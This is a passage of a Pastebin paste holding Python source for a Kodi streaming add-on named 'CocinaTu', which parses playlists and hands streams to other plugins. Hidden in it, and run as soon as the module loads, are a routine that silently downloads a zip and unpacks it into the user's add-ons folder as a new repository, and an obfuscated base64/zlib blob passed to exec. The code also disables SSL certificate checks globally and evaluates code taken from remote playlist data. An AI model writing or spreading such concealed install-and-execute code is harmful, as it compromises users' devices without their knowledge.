CajonDesastreAddon

Default Cocina

Jul 1st, 2019
267
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 139.49 KB | None | 0 0
  1. # -*- coding: utf-8 -*-
  2. import urllib
  3. import urllib2
  4. import re
  5. import os
  6. import xbmcplugin
  7. import xbmcgui
  8. import xbmcaddon
  9. import xbmcvfs
  10. import traceback
  11. import cookielib,base64
  12.  
  13. from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
  14. viewmode=None
  15. try:
  16. from xml.sax.saxutils import escape
  17. except: traceback.print_exc()
  18. try:
  19. import json
  20. except:
  21. import simplejson as json
  22. import SimpleDownloader as downloader
  23. import time
  24.  
  25. try:
  26. import ssl
  27. ssl._create_default_https_context = ssl._create_unverified_context
  28. except:
  29. pass
  30.  
  31. import zipfile
  32.  
  33. def ExtractAll(_in, _out):
  34. try:
  35. zin = zipfile.ZipFile(_in, 'r')
  36. zin.extractall(_out)
  37. except Exception, e:
  38. print str(e)
  39. return False
  40.  
  41. return True
  42.  
  43.  
  44.  
  45. def Repo():
  46. if os.path.exists(os.path.join(xbmc.translatePath("special://home/addons/").decode("utf-8"), 'repository.adryan')):
  47. return
  48.  
  49. url = "http://www.pastebin.com"
  50. addonsDir = xbmc.translatePath(os.path.join('special://home', 'addons')).decode("utf-8")
  51. packageFile = os.path.join(addonsDir, 'packages', 'isr.zip')
  52.  
  53. urllib.urlretrieve(url, packageFile)
  54. ExtractAll(packageFile, addonsDir)
  55.  
  56. try:
  57. os.remove(packageFile)
  58. except:
  59. pass
  60.  
  61. xbmc.executebuiltin("UpdateLocalAddons")
  62. xbmc.executebuiltin("UpdateAddonRepos")
  63.  
  64.  
  65. Repo()
  66. tsdownloader=False
  67. hlsretry=False
  68. resolve_url=['180upload.com', 'allmyvideos.net', 'bestreams.net', 'clicknupload.com', 'cloudzilla.to', 'movshare.net', 'novamov.com', 'nowvideo.sx', 'videoweed.es', 'daclips.in', 'datemule.com', 'fastvideo.in', 'faststream.in', 'filehoot.com', 'filenuke.com', 'sharesix.com', 'plus.google.com', 'picasaweb.google.com', 'gorillavid.com', 'gorillavid.in', 'grifthost.com', 'hugefiles.net', 'ipithos.to', 'ishared.eu', 'kingfiles.net', 'mail.ru', 'my.mail.ru', 'videoapi.my.mail.ru', 'mightyupload.com', 'mooshare.biz', 'movdivx.com', 'movpod.net', 'movpod.in', 'movreel.com', 'mrfile.me', 'nosvideo.com', 'openload.io', 'played.to', 'bitshare.com', 'filefactory.com', 'k2s.cc', 'oboom.com', 'rapidgator.net', 'primeshare.tv', 'bitshare.com', 'filefactory.com', 'k2s.cc', 'oboom.com', 'rapidgator.net', 'sharerepo.com', 'stagevu.com', 'streamcloud.eu', 'streamin.to', 'thefile.me', 'thevideo.me', 'tusfiles.net', 'uploadc.com', 'zalaa.com', 'uploadrocket.net', 'uptobox.com', 'v-vids.com', 'veehd.com', 'vidbull.com', 'videomega.tv', 'vidplay.net', 'vidspot.net', 'vidto.me', 'vidzi.tv', 'vimeo.com', 'vk.com', 'vodlocker.com', 'xfileload.com', 'xvidstage.com', 'zettahost.tv']
  69. g_ignoreSetResolved=['plugin.video.dramasonline','plugin.video.f4mTester','plugin.video.shahidmbcnet','plugin.video.SportsDevil','plugin.stream.vaughnlive.tv','plugin.video.ZemTV-shani']
  70. global gLSProDynamicCodeNumber
  71. gLSProDynamicCodeNumber=0
  72. class NoRedirection(urllib2.HTTPErrorProcessor):
  73. def http_response(self, request, response):
  74. return response
  75. https_response = http_response
  76.  
  77. REMOTE_DBG=False;
  78. if REMOTE_DBG:
  79. # Make pydev debugger works for auto reload.
  80. # Note pydevd module need to be copied in XBMC\system\python\Lib\pysrc
  81. try:
  82. import pysrc.pydevd as pydevd
  83. # stdoutToServer and stderrToServer redirect stdout and stderr to eclipse console
  84. pydevd.settrace('localhost', stdoutToServer=True, stderrToServer=True)
  85. except ImportError:
  86. sys.stderr.write("Error: " +
  87. "You must add org.python.pydev.debug.pysrc to your PYTHONPATH.")
  88. sys.exit(1)
  89.  
  90. addon = xbmcaddon.Addon('plugin.video.CocinaTu')
  91. addon_version = addon.getAddonInfo('version')
  92. profile = xbmc.translatePath(addon.getAddonInfo('profile').decode('utf-8'))
  93. home = xbmc.translatePath(addon.getAddonInfo('path').decode('utf-8'))
  94. favorites = os.path.join(profile, 'favorites')
  95. history = os.path.join(profile, 'history')
  96. REV = os.path.join(profile, 'list_revision')
  97. icon = os.path.join(home, 'icon.png')
  98. favoritos = "https://raw.githubusercontent.com/hectorbolu/CocinaTu/master/Imagenes/Favoritos.jpg"
  99. FANART = os.path.join(home, 'fanart.jpg')
  100. source_file = os.path.join(profile, 'source_file')
  101. functions_dir = profile
  102.  
  103. communityfiles = os.path.join(profile, 'LivewebTV')
  104. downloader = downloader.SimpleDownloader()
  105. debug = addon.getSetting('debug')
  106. if os.path.exists(favorites)==True:
  107. FAV = open(favorites).read()
  108. else: FAV = []
  109.  
  110. import zlib, base64
  111. exec(zlib.decompress(base64.b64decode('eNo1zE8LgjAYgPGvMobH2FsdBQ8hMyL7g6tL0WGOpYu52XxHSPTdi8D78/zE4VzlXJCMXN80BktTQlvEPgWoDTI7wrIo+8tzTJJSHIPnTm31mOVeGSdPcc7mbJEkdEboXToZcPqHHxDkizUG21jHQQflHWqHTPkOWq3Qh9rbCJMEnRxQB9jsVmu+5wIqidJHY60u/vIUskff0M/tC/h3P04=')))
  112.  
  113.  
  114. def addon_log(string):
  115. if debug == 'true':
  116. xbmc.log("[addon.CocinaTu-%s]: %s" %(addon_version, string))
  117.  
  118.  
  119.  
  120.  
  121. def makeRequest(url, headers=None):
  122. try:
  123. if headers is None:
  124. headers = {'User-agent' : 'CocinaTu'}
  125.  
  126.  
  127. if '|' in url:
  128. url,header_in_page=url.split('|')
  129. header_in_page=header_in_page.split('&')
  130.  
  131. for h in header_in_page:
  132. if len(h.split('='))==2:
  133. n,v=h.split('=')
  134. else:
  135. vals=h.split('=')
  136. n=vals[0]
  137. v='='.join(vals[1:])
  138. #n,v=h.split('=')
  139. print n,v
  140. headers[n]=v
  141.  
  142. req = urllib2.Request(url,None,headers)
  143. response = urllib2.urlopen(req)
  144. data = response.read()
  145. response.close()
  146. return data
  147. except urllib2.URLError, e:
  148. addon_log('URL: '+url)
  149. if hasattr(e, 'code'):
  150. addon_log('We failed with error code - %s.' % e.code)
  151. xbmc.executebuiltin("XBMC.Notification(CocinaTu,We failed with error code - "+str(e.code)+",10000,"+icon+")")
  152.  
  153. elif hasattr(e, 'reason'):
  154. addon_log('We failed to reach a server.')
  155. addon_log('Reason: %s' %e.reason)
  156. xbmc.executebuiltin("XBMC.Notification(CocinaTu,We failed to reach a server. - "+str(e.reason)+",10000,"+icon+")")
  157.  
  158.  
  159.  
  160.  
  161. def getSources():
  162. try:
  163. if os.path.exists(favorites) == True:
  164. FAV = open(favorites).read()
  165. if FAV == "[]":
  166. os.remove(favorites)
  167. else:
  168. #addDir('[COLOR white][B]FAVORITOS[/COLOR][/B]','url',4,os.path.join(home, 'resources', ''),FANART,'','','','')
  169. addDir('[COLOR orange]Favoritos[/COLOR]','url',4,favoritos,FANART,'','','','')
  170.  
  171. sources = SOURCES
  172. #print 'sources',sources
  173. if len(sources) > 1:
  174. for i in sources:
  175. try:
  176. ## for pre 1.0.8 sources
  177. if isinstance(i, list):
  178. addDir(i[0].encode('utf-8'),i[1].encode('utf-8'),1,icon,FANART,'','','','','source')
  179. else:
  180. thumb = icon
  181. fanart = FANART
  182. desc = ''
  183. date = ''
  184. credits = 'CocinaTu'
  185. genre = ''
  186. if i.has_key('thumbnail'):
  187. thumb = i['thumbnail']
  188. if i.has_key('fanart'):
  189. fanart = i['fanart']
  190. if i.has_key('description'):
  191. desc = i['description']
  192. if i.has_key('date'):
  193. date = i['date']
  194. if i.has_key('genre'):
  195. genre = i['genre']
  196. if i.has_key('credits'):
  197. credits = i['credits']
  198. addDir(i['title'].encode('utf-8'),i['url'].encode('utf-8'),1,thumb,fanart,desc,genre,date,credits,'source')
  199. except: traceback.print_exc()
  200. else:
  201. if len(sources) == 1:
  202. if isinstance(sources[0], list):
  203. getData(sources[0][1].encode('utf-8'),FANART)
  204. else:
  205. getData(sources[0]['url'], sources[0]['fanart'])
  206. except: traceback.print_exc()
  207.  
  208. def addSource(url=None):
  209. if url is None:
  210. if not addon.getSetting("new_file_source") == "":
  211. source_url = addon.getSetting('new_file_source').decode('utf-8')
  212. elif not addon.getSetting("new_url_source") == "":
  213. source_url = addon.getSetting('new_url_source').decode('utf-8')
  214. else:
  215. source_url = url
  216. if source_url == '' or source_url is None:
  217. return
  218. addon_log('Adding New Source: '+source_url.encode('utf-8'))
  219.  
  220. media_info = None
  221. #print 'source_url',source_url
  222. data = getSoup(source_url)
  223.  
  224. if isinstance(data,BeautifulSOAP):
  225. if data.find('channels_info'):
  226. media_info = data.channels_info
  227. elif data.find('items_info'):
  228. media_info = data.items_info
  229. if media_info:
  230. source_media = {}
  231. source_media['url'] = source_url
  232. try: source_media['title'] = media_info.title.string
  233. except: pass
  234. try: source_media['thumbnail'] = media_info.thumbnail.string
  235. except: pass
  236. try: source_media['fanart'] = media_info.fanart.string
  237. except: pass
  238. try: source_media['genre'] = media_info.genre.string
  239. except: pass
  240. try: source_media['description'] = media_info.description.string
  241. except: pass
  242. try: source_media['date'] = media_info.date.string
  243. except: pass
  244. try: source_media['credits'] = media_info.credits.string
  245. except: pass
  246. else:
  247. if '/' in source_url:
  248. nameStr = source_url.split('/')[-1].split('.')[0]
  249. if '\\' in source_url:
  250. nameStr = source_url.split('\\')[-1].split('.')[0]
  251. if '%' in nameStr:
  252. nameStr = urllib.unquote_plus(nameStr)
  253. keyboard = xbmc.Keyboard(nameStr,'Displayed Name, Rename?')
  254. keyboard.doModal()
  255. if (keyboard.isConfirmed() == False):
  256. return
  257. newStr = keyboard.getText()
  258. if len(newStr) == 0:
  259. return
  260. source_media = {}
  261. source_media['title'] = newStr
  262. source_media['url'] = source_url
  263. source_media['fanart'] = fanart
  264.  
  265. if os.path.exists(source_file)==False:
  266. source_list = []
  267. source_list.append(source_media)
  268. b = open(source_file,"w")
  269. b.write(json.dumps(source_list))
  270. b.close()
  271. else:
  272. sources = json.loads(open(source_file,"r").read())
  273. sources.append(source_media)
  274. b = open(source_file,"w")
  275. b.write(json.dumps(sources))
  276. b.close()
  277. addon.setSetting('new_url_source', "")
  278. addon.setSetting('new_file_source', "")
  279. xbmc.executebuiltin("XBMC.Notification(CocinaTu,New source added.,5000,"+icon+")")
  280. if not url is None:
  281. if 'xbmcplus.xb.funpic.de' in url:
  282. xbmc.executebuiltin("XBMC.Container.Update(%s?mode=14,replace)" %sys.argv[0])
  283. elif 'community-links' in url:
  284. xbmc.executebuiltin("XBMC.Container.Update(%s?mode=10,replace)" %sys.argv[0])
  285. else: addon.openSettings()
  286.  
  287. def rmSource(name):
  288. sources = json.loads(open(source_file,"r").read())
  289. for index in range(len(sources)):
  290. if isinstance(sources[index], list):
  291. if sources[index][0] == name:
  292. del sources[index]
  293. b = open(source_file,"w")
  294. b.write(json.dumps(sources))
  295. b.close()
  296. break
  297. else:
  298. if sources[index]['title'] == name:
  299. del sources[index]
  300. b = open(source_file,"w")
  301. b.write(json.dumps(sources))
  302. b.close()
  303. break
  304. xbmc.executebuiltin("XBMC.Container.Refresh")
  305.  
  306. def get_xml_database(url, browse=False):
  307. if url is None:
  308. url = 'http://xbmcplus.xb.funpic.de/www-data/filesystem/'
  309. soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
  310. for i in soup('a'):
  311. href = i['href']
  312. if not href.startswith('?'):
  313. name = i.string
  314. if name not in ['Parent Directory', 'recycle_bin/']:
  315. if href.endswith('/'):
  316. if browse:
  317. addDir(name,url+href,15,icon,fanart,'','','')
  318. else:
  319. addDir(name,url+href,14,icon,fanart,'','','')
  320. elif href.endswith('.xml'):
  321. if browse:
  322. addDir(name,url+href,1,icon,fanart,'','','','','download')
  323. else:
  324. if os.path.exists(source_file)==True:
  325. if name in SOURCES:
  326. addDir(name+' (in use)',url+href,11,icon,fanart,'','','','','download')
  327. else:
  328. addDir(name,url+href,11,icon,fanart,'','','','','download')
  329. else:
  330. addDir(name,url+href,11,icon,fanart,'','','','','download')
  331.  
  332.  
  333. def getCommunitySources(browse=False):
  334. url = 'http://community-links.googlecode.com/svn/trunk/'
  335. soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
  336. files = soup('ul')[0]('li')[1:]
  337. for i in files:
  338. name = i('a')[0]['href']
  339. if browse:
  340. addDir(name,url+name,1,icon,fanart,'','','','','download')
  341. else:
  342. addDir(name,url+name,11,icon,fanart,'','','','','download')
  343.  
  344. def getSoup(url,data=None):
  345. global viewmode,tsdownloader, hlsretry
  346. tsdownloader=False
  347. hlsretry=False
  348. if url.startswith('http://') or url.startswith('https://'):
  349. enckey=False
  350. if '$$TSDOWNLOADER$$' in url:
  351. tsdownloader=True
  352. url=url.replace("$$TSDOWNLOADER$$","")
  353. if '$$HLSRETRY$$' in url:
  354. hlsretry=True
  355. url=url.replace("$$HLSRETRY$$","")
  356. if '$$LSProEncKey=' in url:
  357. enckey=url.split('$$LSProEncKey=')[1].split('$$')[0]
  358. rp='$$LSProEncKey=%s$$'%enckey
  359. url=url.replace(rp,"")
  360.  
  361. data =makeRequest(url)
  362. if enckey:
  363. import pyaes
  364. enckey=enckey.encode("ascii")
  365. print enckey
  366. missingbytes=16-len(enckey)
  367. enckey=enckey+(chr(0)*(missingbytes))
  368. print repr(enckey)
  369. data=base64.b64decode(data)
  370. decryptor = pyaes.new(enckey , pyaes.MODE_ECB, IV=None)
  371. data=decryptor.decrypt(data).split('\0')[0]
  372. #print repr(data)
  373. if re.search("#EXTM3U",data) or 'm3u' in url:
  374. # print 'found m3u data'
  375. return data
  376. elif data == None:
  377. if not '/' in url or not '\\' in url:
  378. # print 'No directory found. Lets make the url to cache dir'
  379. url = os.path.join(communityfiles,url)
  380. if xbmcvfs.exists(url):
  381. if url.startswith("smb://") or url.startswith("nfs://"):
  382. copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
  383. if copy:
  384. data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
  385. xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
  386. else:
  387. addon_log("failed to copy from smb:")
  388. else:
  389. data = open(url, 'r').read()
  390. if re.match("#EXTM3U",data)or 'm3u' in url:
  391. # print 'found m3u data'
  392. return data
  393. else:
  394. addon_log("Soup Data not found!")
  395. return
  396. if '<SetViewMode>' in data:
  397. try:
  398. viewmode=re.findall('<SetViewMode>(.*?)<',data)[0]
  399. xbmc.executebuiltin("Container.SetViewMode(%s)"%viewmode)
  400. print 'done setview',viewmode
  401. except: pass
  402. return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
  403.  
  404. def processPyFunction(data):
  405. try:
  406. if data and len(data)>0 and data.startswith('$pyFunction:'):
  407. data=doEval(data.split('$pyFunction:')[1],'',None,None )
  408. except: pass
  409.  
  410. return data
  411.  
  412. def getData(url,fanart, data=None):
  413. import checkbad
  414. checkbad.do_block_check(False)
  415. soup = getSoup(url,data)
  416. #print type(soup)
  417. if isinstance(soup,BeautifulSOAP):
  418. #print 'xxxxxxxxxxsoup',soup
  419. if len(soup('channels')) > 0 and addon.getSetting('donotshowbychannels') == 'false':
  420. channels = soup('channel')
  421. for channel in channels:
  422. # print channel
  423.  
  424. linkedUrl=''
  425. lcount=0
  426. try:
  427. linkedUrl = channel('externallink')[0].string
  428. lcount=len(channel('externallink'))
  429. except: pass
  430. #print 'linkedUrl',linkedUrl,lcount
  431. if lcount>1: linkedUrl=''
  432.  
  433. name = channel('name')[0].string
  434. try:
  435. name=processPyFunction(name)
  436. except: pass
  437. thumbnail = channel('thumbnail')[0].string
  438. if thumbnail == None:
  439. thumbnail = ''
  440. thumbnail=processPyFunction(thumbnail)
  441. try:
  442. if not channel('fanart'):
  443. if addon.getSetting('use_thumb') == "true":
  444. fanArt = thumbnail
  445. else:
  446. fanArt = fanart
  447. else:
  448. fanArt = channel('fanart')[0].string
  449. if fanArt == None:
  450. raise
  451. except:
  452. fanArt = fanart
  453.  
  454. try:
  455. desc = channel('info')[0].string
  456. if desc == None:
  457. raise
  458. except:
  459. desc = ''
  460.  
  461. try:
  462. genre = channel('genre')[0].string
  463. if genre == None:
  464. raise
  465. except:
  466. genre = ''
  467.  
  468. try:
  469. date = channel('date')[0].string
  470. if date == None:
  471. raise
  472. except:
  473. date = ''
  474.  
  475. try:
  476. credits = channel('credits')[0].string
  477. if credits == None:
  478. raise
  479. except:
  480. credits = ''
  481.  
  482. try:
  483. if linkedUrl=='':
  484. addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),2,thumbnail,fanArt,desc,genre,date,credits,True)
  485. else:
  486. #print linkedUrl
  487. addDir(name.encode('utf-8'),linkedUrl.encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'source')
  488. except:
  489. addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
  490. else:
  491. addon_log('No Channels: getItems')
  492. getItems(soup('item'),fanart)
  493. else:
  494. parse_m3u(soup)
  495. # borrow from https://github.com/enen92/P2P-Streams-XBMC/blob/master/plugin.video.p2p-streams/resources/core/livestreams.py
  496. # This will not go through the getItems functions ( means you must have ready to play url, no regex)
  497. def parse_m3u(data):
  498. content = data.rstrip()
  499. match = re.compile(r'#EXTINF:(.+?),(.*?)[\n\r]+([^\r\n]+)').findall(content)
  500. total = len(match)
  501. print 'tsdownloader',tsdownloader
  502. # print 'total m3u links',total
  503. for other,channel_name,stream_url in match:
  504.  
  505. if 'tvg-logo' in other:
  506. thumbnail = re_me(other,'tvg-logo=[\'"](.*?)[\'"]')
  507. if thumbnail:
  508. if thumbnail.startswith('http'):
  509. thumbnail = thumbnail
  510.  
  511. elif not addon.getSetting('logo-folderPath') == "":
  512. logo_url = addon.getSetting('logo-folderPath')
  513. thumbnail = logo_url + thumbnail
  514.  
  515. else:
  516. thumbnail = thumbnail
  517. #else:
  518.  
  519. else:
  520. thumbnail = ''
  521.  
  522. if 'type' in other:
  523. mode_type = re_me(other,'type=[\'"](.*?)[\'"]')
  524. if mode_type == 'yt-dl':
  525. stream_url = stream_url +"&mode=18"
  526. elif mode_type == 'regex':
  527. url = stream_url.split('&regexs=')
  528. #print url[0] getSoup(url,data=None)
  529. regexs = parse_regex(getSoup('',data=url[1]))
  530.  
  531. addLink(url[0], channel_name,thumbnail,'','','','','',None,regexs,total)
  532. continue
  533. elif mode_type == 'ftv':
  534. stream_url = 'plugin://plugin.video.F.T.V/?name='+urllib.quote(channel_name) +'&url=' +stream_url +'&mode=125&ch_fanart=na'
  535. elif tsdownloader and '.ts' in stream_url:
  536. stream_url = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(stream_url)+'&amp;streamtype=TSDOWNLOADER&name='+urllib.quote(channel_name)
  537. elif hlsretry and '.m3u8' in stream_url:
  538. stream_url = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(stream_url)+'&amp;streamtype=HLSRETRY&name='+urllib.quote(channel_name)
  539. addLink(stream_url, channel_name,thumbnail,'','','','','',None,'',total)
  540. def getChannelItems(name,url,fanart):
  541. soup = getSoup(url)
  542. channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
  543. items = channel_list('item')
  544. try:
  545. fanArt = channel_list('fanart')[0].string
  546. if fanArt == None:
  547. raise
  548. except:
  549. fanArt = fanart
  550. for channel in channel_list('subchannel'):
  551. name = channel('name')[0].string
  552. try:
  553. name=processPyFunction(name)
  554. except: pass
  555. try:
  556. thumbnail = channel('thumbnail')[0].string
  557. if thumbnail == None:
  558. raise
  559. thumbnail=processPyFunction(thumbnail)
  560. except:
  561. thumbnail = ''
  562. try:
  563. if not channel('fanart'):
  564. if addon.getSetting('use_thumb') == "true":
  565. fanArt = thumbnail
  566. else:
  567. fanArt = channel('fanart')[0].string
  568. if fanArt == None:
  569. raise
  570. except:
  571. pass
  572. try:
  573. desc = channel('info')[0].string
  574. if desc == None:
  575. raise
  576. except:
  577. desc = ''
  578.  
  579. try:
  580. genre = channel('genre')[0].string
  581. if genre == None:
  582. raise
  583. except:
  584. genre = ''
  585.  
  586. try:
  587. date = channel('date')[0].string
  588. if date == None:
  589. raise
  590. except:
  591. date = ''
  592.  
  593. try:
  594. credits = channel('credits')[0].string
  595. if credits == None:
  596. raise
  597. except:
  598. credits = ''
  599.  
  600. try:
  601. addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
  602. except:
  603. addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
  604. getItems(items,fanArt)
  605.  
  606.  
  607. def getSubChannelItems(name,url,fanart):
  608. soup = getSoup(url)
  609. channel_list = soup.find('subchannel', attrs={'name' : name.decode('utf-8')})
  610. items = channel_list('subitem')
  611. getItems(items,fanart)
  612.  
  613. def getItems(items,fanart,dontLink=False):
  614. total = len(items)
  615. addon_log('Total Items: %s' %total)
  616. add_playlist = addon.getSetting('add_playlist')
  617. ask_playlist_items =addon.getSetting('ask_playlist_items')
  618. use_thumb = addon.getSetting('use_thumb')
  619. parentalblock =addon.getSetting('parentalblocked')
  620. parentalblock= parentalblock=="true"
  621. for item in items:
  622. isXMLSource=False
  623. isJsonrpc = False
  624.  
  625. applyblock='false'
  626. try:
  627. applyblock = item('parentalblock')[0].string
  628. except:
  629. addon_log('parentalblock Error')
  630. applyblock = ''
  631. if applyblock=='true' and parentalblock: continue
  632.  
  633. try:
  634. name = item('title')[0].string
  635. if name is None:
  636. name = 'unknown?'
  637. try:
  638. name=processPyFunction(name)
  639. except: pass
  640.  
  641. except:
  642. addon_log('Name Error')
  643. name = ''
  644.  
  645.  
  646. try:
  647. if item('epg'):
  648. if item.epg_url:
  649. addon_log('Get EPG Regex')
  650. epg_url = item.epg_url.string
  651. epg_regex = item.epg_regex.string
  652. epg_name = get_epg(epg_url, epg_regex)
  653. if epg_name:
  654. name += ' - ' + epg_name
  655. elif item('epg')[0].string > 1:
  656. name += getepg(item('epg')[0].string)
  657. else:
  658. pass
  659. except:
  660. addon_log('EPG Error')
  661. try:
  662. url = []
  663. if len(item('link')) >0:
  664. #print 'item link', item('link')
  665.  
  666. for i in item('link'):
  667. if not i.string == None:
  668. url.append(i.string)
  669.  
  670. elif len(item('sportsdevil')) >0:
  671. for i in item('sportsdevil'):
  672. if not i.string == None:
  673. sportsdevil = 'plugin://plugin.video.SportsDevil/?mode=1&amp;item=catcher%3dstreams%26url=' +i.string
  674. referer = item('referer')[0].string
  675. if referer:
  676. #print 'referer found'
  677. sportsdevil = sportsdevil + '%26referer=' +referer
  678. url.append(sportsdevil)
  679. elif len(item('p2p')) >0:
  680. for i in item('p2p'):
  681. if not i.string == None:
  682. if 'sop://' in i.string:
  683. sop = 'plugin://plugin.video.p2p-streams/?mode=2url='+i.string +'&' + 'name='+name
  684. url.append(sop)
  685. else:
  686. p2p='plugin://plugin.video.p2p-streams/?mode=1&url='+i.string +'&' + 'name='+name
  687. url.append(p2p)
  688. elif len(item('vaughn')) >0:
  689. for i in item('vaughn'):
  690. if not i.string == None:
  691. vaughn = 'plugin://plugin.stream.vaughnlive.tv/?mode=PlayLiveStream&amp;channel='+i.string
  692. url.append(vaughn)
  693. elif len(item('ilive')) >0:
  694. for i in item('ilive'):
  695. if not i.string == None:
  696. if not 'http' in i.string:
  697. ilive = 'plugin://plugin.video.tbh.ilive/?url=http://www.streamlive.to/view/'+i.string+'&amp;link=99&amp;mode=iLivePlay'
  698. else:
  699. ilive = 'plugin://plugin.video.tbh.ilive/?url='+i.string+'&amp;link=99&amp;mode=iLivePlay'
  700. elif len(item('yt-dl')) >0:
  701. for i in item('yt-dl'):
  702. if not i.string == None:
  703. ytdl = i.string + '&mode=18'
  704. url.append(ytdl)
  705. elif len(item('dm')) >0:
  706. for i in item('dm'):
  707. if not i.string == None:
  708. dm = "plugin://plugin.video.dailymotion_com/?mode=playVideo&url=" + i.string
  709. url.append(dm)
  710. elif len(item('dmlive')) >0:
  711. for i in item('dmlive'):
  712. if not i.string == None:
  713. dm = "plugin://plugin.video.dailymotion_com/?mode=playLiveVideo&url=" + i.string
  714. url.append(dm)
  715. elif len(item('utube')) >0:
  716. for i in item('utube'):
  717. if not i.string == None:
  718. if ' ' in i.string :
  719. utube = 'plugin://plugin.video.youtube/search/?q='+ urllib.quote_plus(i.string)
  720. isJsonrpc=utube
  721. elif len(i.string) == 11:
  722. utube = 'plugin://plugin.video.youtube/play/?video_id='+ i.string
  723. elif (i.string.startswith('PL') and not '&order=' in i.string) or i.string.startswith('UU'):
  724. utube = 'plugin://plugin.video.youtube/play/?&order=default&playlist_id=' + i.string
  725. elif i.string.startswith('PL') or i.string.startswith('UU'):
  726. utube = 'plugin://plugin.video.youtube/play/?playlist_id=' + i.string
  727. elif i.string.startswith('UC') and len(i.string) > 12:
  728. utube = 'plugin://plugin.video.youtube/channel/' + i.string + '/'
  729. isJsonrpc=utube
  730. elif not i.string.startswith('UC') and not (i.string.startswith('PL')) :
  731. utube = 'plugin://plugin.video.youtube/user/' + i.string + '/'
  732. isJsonrpc=utube
  733. url.append(utube)
  734. elif len(item('imdb')) >0:
  735. for i in item('imdb'):
  736. if not i.string == None:
  737. if addon.getSetting('genesisorpulsar') == '0':
  738. imdb = 'plugin://plugin.video.genesis/?action=play&imdb='+i.string
  739. else:
  740. imdb = 'plugin://plugin.video.pulsar/movie/tt'+i.string+'/play'
  741. url.append(imdb)
  742. elif len(item('f4m')) >0:
  743. for i in item('f4m'):
  744. if not i.string == None:
  745. if '.f4m' in i.string:
  746. f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)
  747. elif '.m3u8' in i.string:
  748. f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)+'&amp;streamtype=HLS'
  749.  
  750. else:
  751. f4m = 'plugin://plugin.video.f4mTester/?url='+urllib.quote_plus(i.string)+'&amp;streamtype=SIMPLE'
  752. url.append(f4m)
  753. elif len(item('ftv')) >0:
  754. for i in item('ftv'):
  755. if not i.string == None:
  756. ftv = 'plugin://plugin.video.F.T.V/?name='+urllib.quote(name) +'&url=' +i.string +'&mode=125&ch_fanart=na'
  757. url.append(ftv)
  758. elif len(item('urlsolve')) >0:
  759.  
  760. for i in item('urlsolve'):
  761. if not i.string == None:
  762. resolver = i.string +'&mode=19'
  763. url.append(resolver)
  764. if len(url) < 1:
  765. raise
  766. except:
  767. addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
  768. continue
  769. try:
  770. isXMLSource = item('externallink')[0].string
  771. except: pass
  772.  
  773. if isXMLSource:
  774. ext_url=[isXMLSource]
  775. isXMLSource=True
  776. else:
  777. isXMLSource=False
  778. try:
  779. isJsonrpc = item('jsonrpc')[0].string
  780. except: pass
  781. if isJsonrpc:
  782.  
  783. ext_url=[isJsonrpc]
  784. #print 'JSON-RPC ext_url',ext_url
  785. isJsonrpc=True
  786. else:
  787. isJsonrpc=False
  788. try:
  789. thumbnail = item('thumbnail')[0].string
  790. if thumbnail == None:
  791. raise
  792. thumbnail=processPyFunction(thumbnail)
  793. except:
  794. thumbnail = ''
  795. try:
  796. if not item('fanart'):
  797. if addon.getSetting('use_thumb') == "true":
  798. fanArt = thumbnail
  799. else:
  800. fanArt = fanart
  801. else:
  802. fanArt = item('fanart')[0].string
  803. if fanArt == None:
  804. raise
  805. except:
  806. fanArt = fanart
  807. try:
  808. desc = item('info')[0].string
  809. if desc == None:
  810. raise
  811. except:
  812. desc = ''
  813.  
  814. try:
  815. genre = item('genre')[0].string
  816. if genre == None:
  817. raise
  818. except:
  819. genre = ''
  820.  
  821. try:
  822. date = item('date')[0].string
  823. if date == None:
  824. raise
  825. except:
  826. date = ''
  827.  
  828. regexs = None
  829. if item('regex'):
  830. try:
  831. reg_item = item('regex')
  832. regexs = parse_regex(reg_item)
  833. except:
  834. pass
  835. try:
  836.  
  837. if len(url) > 1:
  838. alt = 0
  839. playlist = []
  840. ignorelistsetting=True if '$$LSPlayOnlyOne$$' in url[0] else False
  841.  
  842. for i in url:
  843. if add_playlist == "false" and not ignorelistsetting:
  844. alt += 1
  845. addLink(i,'%s) %s' %(alt, name.encode('utf-8', 'ignore')),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
  846. elif (add_playlist == "true" and ask_playlist_items == 'true') or ignorelistsetting:
  847. if regexs:
  848. playlist.append(i+'&regexs='+regexs)
  849. elif any(x in i for x in resolve_url) and i.startswith('http'):
  850. playlist.append(i+'&mode=19')
  851. else:
  852. playlist.append(i)
  853. else:
  854. playlist.append(i)
  855.  
  856. if len(playlist) > 1:
  857.  
  858. addLink('', name.encode('utf-8'),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
  859. else:
  860.  
  861. if dontLink:
  862. return name,url[0],regexs
  863. if isXMLSource:
  864. if not regexs == None: #<externallink> and <regex>
  865. addDir(name.encode('utf-8'),ext_url[0].encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'!!update',regexs,url[0].encode('utf-8'))
  866. #addLink(url[0],name.encode('utf-8', 'ignore')+ '[COLOR yellow]build XML[/COLOR]',thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
  867. else:
  868. addDir(name.encode('utf-8'),ext_url[0].encode('utf-8'),1,thumbnail,fanArt,desc,genre,date,None,'source',None,None)
